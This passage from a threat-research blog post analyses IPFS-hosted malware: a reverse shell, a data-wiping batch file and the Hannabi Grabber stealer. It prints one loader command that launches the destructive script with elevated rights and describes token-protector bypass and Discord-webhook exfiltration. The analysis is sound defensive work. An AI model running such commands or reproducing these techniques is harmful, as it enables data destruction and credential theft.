During our analysis of samples associated with this loader, we observed that the IPFS gateway that was being used was no longer servicing requests, however, Talos obtained the next-stage payloads manually via another IPFS gateways for analysis.

**Reverse shell**

In one of the clusters leveraging this loader, we observed that the payload being hosted within the IPFS network was a Python script containing a large base64 encoded blob along with the Python code responsible for decoding the base64. Note that the following screenshot was redacted for space, as the base64-encoded blob was rather large.

The base64 contained several layers of base64 encoded blobs, each wrapped in Python code responsible for decoding them. After decoding all of the layers, the following is the deobfuscated reverse shell payload.

At the time of analysis, the C2 server was no longer servicing requests on TCP/4444.

**Destructive Malware**

In another cluster we analyzed, we observed that the final payload hosted within IPFS was a Windows batch file, as shown below:

When the batch file is retrieved, it is stored within the Network directory using the filename “Script.bat.”

This batch file is responsible for the following destructive behavior:

*   Deleting volume shadow copies on the system.
*   Deleting directory contents stored within C:\\Users (typically associated with user profiles).
*   Iterating through all mounted filesystems present on the system and deleting contents stored on them.

Fortunately for victims, in the samples analyzed the loader incorrectly attempts to invoke the batch file as shown below.

C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && powershell -Command start script.bat -Verb RunAs

**Hannabi Grabber**

The final cluster of malware associated with this loader is responsible for retrieving and executing a Python-based information stealer called Hannabi Grabber. In the samples we analyzed, the Python version retrieved does not natively contain the modules required for the script to successfully execute causing the infection process to fail, however, given the volume of features present in the stealer, we analyzed it to confirm detection capabilities in the case that it is distributed via different mechanisms.

Hannabi Grabber is a full-featured information stealer written in Python. It leverages Discord Webhooks for C2 and data exfiltration. It currently features support for stealing information from a variety of applications that may be present on victim systems. It collects survey information from the infected machine, obtains the geographic location of the system via the IPInfo service, takes screenshots and eventually transmits that data to an attacker-controlled Discord server in JSON format.

Below is a listing of many of the various applications the stealer supports.

In addition to the previously listed applications, the malware also supports retrieving password and cookie data from Chrome, as shown below.

Similar functionality also exists to target Mozilla Firefox browser data that may be present on the system.

The information stealer is particularly interested in Discord and Roblox data. It features several mechanisms that check for the existence of Discord Token Protectors such as DiscordTokenProtector, BetterDiscord and more. If discovered, the malware will attempt to bypass them to obtain Discord tokens from the victim. An example of one of these checks is shown below.

Application data that is collected is stored within a directory structure inside of the %TEMP% directory, in a folder called “RedDiscord” that is created by the malware. Before exfiltrating the data, the malware creates a ZIP archive within the RedDiscord directory called “Hannabi-<USERNAME>.zip.” The malware first transmits beacon information and will then attempt to exfiltrate the newly created ZIP archive.

Hannabi Grabber has a significant amount of functionality that is common to information-stealing malware. Typically, attackers will attempt to leverage PyInstaller or Py2EXE to compile their Python into a PE32 file format prior to distributing it to victims. This is a case where instead, the attacker chose to include a Python installation process during the infection and is leveraging Python directly to steal sensitive information from victims.

**Conclusion**

Many new Web3 technologies have emerged recently, attempting to provide valuable functionality to users. As these technologies have continued to see increased adoption for legitimate purposes, they have begun to be leveraged by adversaries as well. We have continued to observe an increase in the volume of malware and phishing campaigns that are taking advantage of technologies like IPFS for the purposes of hosting malicious components used in malware infections, phishing kits used to collect sensitive authentication data and more.

We expect this activity to continue to increase as more threat actors recognize that IPFS can be used to facilitate bulletproof hosting, is resilient against content moderation and law enforcement activities, and introduces problems for organizations attempting to detect and defend against attacks that may leverage the IPFS network. Organizations should be aware of how these newly emerging technologies are being actively used across the threat landscape and evaluate how to best implement security controls to prevent or detect successful attacks in their environments.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60728.

The following ClamAV signatures are applicable to this threat:

*   Win.Trojan.AgentTesla-9974905-1
*   Pdf.Phishing.Agent-9974919-0
*   Txt.Malware.ArtifactDeletion-9974896-0
*   Win.Trojan.AgentTesla-9974906-0
*   Win.Downloader.ReverseShell-9974652-1
*   Win.Loader.Hannabi-9974435-0
*   Win.Trojan.Hannabi\_Grabber-9974436-0
*   Py.Malware.ReverseShell-9974437-0

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

Tag

#pdf